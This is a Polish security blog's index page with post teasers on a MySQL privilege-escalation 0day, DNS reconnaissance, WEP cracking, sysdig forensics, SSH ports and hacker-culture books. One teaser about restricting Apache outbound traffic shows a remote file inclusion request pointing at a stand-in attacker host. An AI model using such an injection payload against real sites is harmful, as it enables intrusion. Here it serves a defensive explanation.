NFsec Logo

MySQL – Zdalne wykonanie kodu oraz eskalacja uprawnień

12/09/2016 w Bezpieczeństwo Możliwość komentowania MySQL – Zdalne wykonanie kodu oraz eskalacja uprawnień została wyłączona

D

awid Glounski opublikował dzisiaj 0day na serwery bazodanowe oparte na silniku MySQL (dotyczy to również MariaDB oraz Percona). Błąd pozwala atakującym na wstrzyknięcie złośliwych ustawień do plików konfiguracyjnych serwera (my.cnf), które mogą prowadzić do poważnych konsekwencji. Podatność dotyka wszystkie serwery MySQL w podstawowej konfiguracji (wersje: 5.7, 5.6 oraz 5.5) wliczając w to najnowsze wersje. Eksploracja błędu może zostać przeprowadzona zarówno lokalnie, jak i zdanie (poprzez uwierzytelniony dostęp sieciowy / interfejs webowy w postaci PHPmyAdmin lub atak SQL Injection). Udane wykorzystanie luki może pozwolić agresorowi na wykonanie dowolnego kodu z uprawnieniami użytkownika root, czyli administratora – w konsekwencji może dojść do pełnej kompromitacji serwera, na którym został zaatakowany daemon MySQL, ponieważ wykorzystanie tej podatności jest możliwe nawet jeśli moduły zabezpieczeń w postaci AppArmor oraz SELinux są aktywowane z domyślnymi politykami dla różnych dystrybucji Linuksa.

Więcej informacji: Szczegóły ataku oraz dowód na słuszność koncepcji

Rekonesans DNS i wrogie przejęcie

03/08/2016 w Pen Test 1 komentarz.

R

ekonesans DNS jest główną częścią etapu zbierania informacji w testach penetracyjnych. Można to porównać do wykonywania mapy infrastruktury danego serwisu. Większość organizacji nie monitoruje ruchu DNS, szczególnie nieudanych zapytań i prób pobrania całej strefy – dlatego wyciśnięcie jak największej ilości informacji z tego źródła często nie wpływa na alarmy w systemach bezpieczeństwa i nie wzbudza podejrzeń. W Internecie istnieje wiele dostępnych narzędzi, które mogą skutecznie wykonywać tego typu operacje, ale my skupimy się tylko na kilku i w dodatku tylko na tych napisanych w języku Python, ponieważ bardzo łatwo jest stworzyć dla nich wirtualne środowisko i zainstalować zależności, aby zadziałały od kopnięcia.
[ czytaj całość… ]

Mr.Robot

29/09/2015 w Hackultura 1 komentarz.

M

r. Robot to serial, który skupia się na Elliocie mającym zaburzenia psychiczne. Przez swoją chorobę nie potrafi kontaktować się z ludźmi. Pewnego razu odkrywa, że może to robić przez hakowanie ich. Nowa umiejętność zmienia jego życie. Musi balansować między firmą zajmującą się bezpieczeństwem w sieci, dla której pracuje a podziemiem hackerskim, które chce go zatrudnić, aby pomógł im zniszczyć amerykańskie korporacje.
[ czytaj całość… ]

Historia pewnego włamania #2

16/01/2015 w Ataki Internetowe Możliwość komentowania Historia pewnego włamania #2 została wyłączona

K

iedyś ku mojemu zdziwieniu prosząc znajomego o udostępnienie WiFi zobaczyłem, że używa jeszcze szyfrowania typu WEP. Po serii epitetów o mądrości tego rozwiązania – otrzymałem odpowiedź, że przy innych formach szyfrowania ma bardzo słaby zasięg na drugim piętrze swojego mieszkania, a z tym przynajmniej działa mu w miarę płynnie Internet i poza tym, kto by się trudził w jakieś tam łamanie szyfru i inne afery szpiegowskie. Pozwoliłem sobie zademonstrować mu ile trudu trzeba włożyć, aby zacząć korzystać z jego sieci domowej oznajmiając, że sam podłącze się do jego routera bez jego pomocy.
[ czytaj całość… ]

Analiza powłamaniowa systemu Linux za pomocą sysdig

02/07/2014 w Bezpieczeństwo Możliwość komentowania Analiza powłamaniowa systemu Linux za pomocą sysdig została wyłączona

N

ie tak dawno firma złożona z niewielkiego zespołu – Draios ogłosiła wydanie narzędzia open source, które nazwała sysdig. Pozwala ono na przechwytywanie, zapisywanie, filtrowanie oraz analizę aktywności różnych procesów w systemie Linux. Jak sami autorzy wspominają łączy ono w sobie takie narzędzia jak strace, tcpdump oraz lsof. Dla administratorów systemów może to być jedno z lepszych narzędzi do wyszukiwania i diagnozowania różnych problemów oraz wąskich gardeł pod względem wydajności w systemie [podobne narzędzie dla systemów z rodziny Unix (Solaris, Mac OS X, FreeBSD) stworzył Brendan D. Greggdtrace]. Poświęcając kilka minut na zapoznanie się z podstawowym jego użyciem oraz kilkoma przykładami jesteśmy w stanie zapomnieć o bólu związanym z badaniem różnych problemów systemu – czy to w środowiskach zwirtualizowanych, czy na "gołym metalu".
[ czytaj całość… ]

Kukułcze Jajo – Clifford Stoll

16/12/2013 w Hackultura Możliwość komentowania Kukułcze Jajo – Clifford Stoll została wyłączona

“W

1965 roku, na długo zanim komputery zaczęto łączyć w sieci, informatyki uczył mnie profesor Bromberg – emigrant z Polski. W przerwach między lekcjami na temat Fortranu opowiadał nam o swojej rodzinnej Bydgoszczy i wakacjach spędzanych nad Wisłą, jak również o Janie Łukasiewiczu, twórcy tak zwanej “notacji polskiej”, używanej do obliczeń w kalkulatorach i komputerach. Mój nauczyciel opowiadał również z dumą o Marianie Rejewskim z krakowskiej szkoły matematyki. Była to fascynująca opowieść o tym, jak stworzył on matematyczny model Enigmy, niemieckiej maszyny szyfrującej, przyczyniając się bezpośrednio do zwycięstwa aliantów w drugiej wojnie światowej. Już wtedy, jako ucznia szkoły średniej, fascynowało mnie łamanie kodów i matematyczne podstawy szyfrowania wiadomości. Moja przygoda z kryptografią, aczkolwiek nie tak ważna jak praca Rejewskiego, wyrosła po części z ziarna, które zasiał mój polski nauczyciel.”
[ czytaj całość… ]

Apache – blokowanie połączeń wychodzących aplikacji z iptables

25/11/2013 w Bezpieczeństwo Możliwość komentowania Apache – blokowanie połączeń wychodzących aplikacji z iptables została wyłączona

S

erwer WWW głównie akceptuje połączenia przychodzące od użytkowników, a sam niekiedy potrzebuje nawiązać nowe połączenia z zewnętrznymi zasobami np. bazą danych. Dlatego dobrze znając architekturę aplikacji – warto ograniczyć jej połączenia wychodzące tylko do tych, które są jej rzeczywiście niezbędne. To sprawia, że tak wyprofilowana sieciowo aplikacja staje się trudniejsza do zdobycia na przykład przez atakującego, który chce wykorzystać atak z wykorzystaniem zewnętrznych zasobów:

/podatny_kod.php?bug=http://evilhacker.net/exploit?

[ czytaj całość… ]

Dlaczego umieszczanie SSH na innym porcie to dobry pomysł

26/10/2013 w Bezpieczeństwo Możliwość komentowania Dlaczego umieszczanie SSH na innym porcie to dobry pomysł została wyłączona

J

akiś czas temu na Hacker News pojawił się artykuł próbujący udowodnić, że uruchamianie daemona SSH na innym porcie niż 22 (Opcja: Port w /etc/ssh/sshd_config) to zły pomysł. Czy na pewno? Autor głównie skupił się w swoich wywodach na argumencie security by obscurity, co jest ulubionym ryżym śledziem ludzi, którzy prawie rozumieją to zagadnienie.
[ czytaj całość… ]

Duch w Sieci – Kevin Mitnick & William L. Simon

23/01/2013 w Hackultura Możliwość komentowania Duch w Sieci – Kevin Mitnick & William L. Simon została wyłączona

1

6 lutego 1995 roku na pierwszej stronie papierowego wydania gazety New York Times, w ramce w lewym górnym rogu – w miejscu tradycyjnie zarezerwowanym przez redaktorów Times’a dla drugiej najważniejszej wiadomości dnia – znalazł się nagłówek “Najbardziej poszukiwany złodziej elektroniczny wpada w własne sidła.” autorstwa John’a Markoff’a. Fakt ten jest tematem przedostatniego rozdziału “Jak zostałem kozłem ofiarnym.” ostatniej – czwartej części 670 stronicowej książki Kevina Mitnicka oraz Williama L. Simona. Dlaczego książka ta jest tak ważna dla “środowiska” i nie tylko?
[ czytaj całość… ]

Daemon – Daniel Suarez

28/07/2012 w Hackultura 1 komentarz.

D

aniel Suarez jako niezależny konsultant ds. systemów oraz programista – zaprojektował i stworzył oprogramowanie służące do obrony krytycznych systemów przemysłu zbrojeniowego, instytucji finansowych oraz branży rozrywkowej. Jego klientami są firmy z listy Fortune 1000. Znany jest również, jako zapalony gracz i technolog aktualnie mieszkający w Los Angeles. Swoją pierwszą publikację zwartą pt. “Daemon” napisał i wydał własnym nakładem (3.500 kopii) – pod sztandarem Verdugo Press pod koniec 2006 roku. Na początku książka stała się sensacją wśród internautów. W majowym wydaniu Wired w 2008 roku ukazał się artykuł traktujący o jego publikacji – wówczas 2.000 egzemplarzy zostało sprzedanych w wielkim pośpiechu. Z tego powodu w styczniu 2009 roku wydawnictwo Dutton ponownie wydało jego działo w większym nakładzie (na początek 11.000 kopii).
[ czytaj całość… ]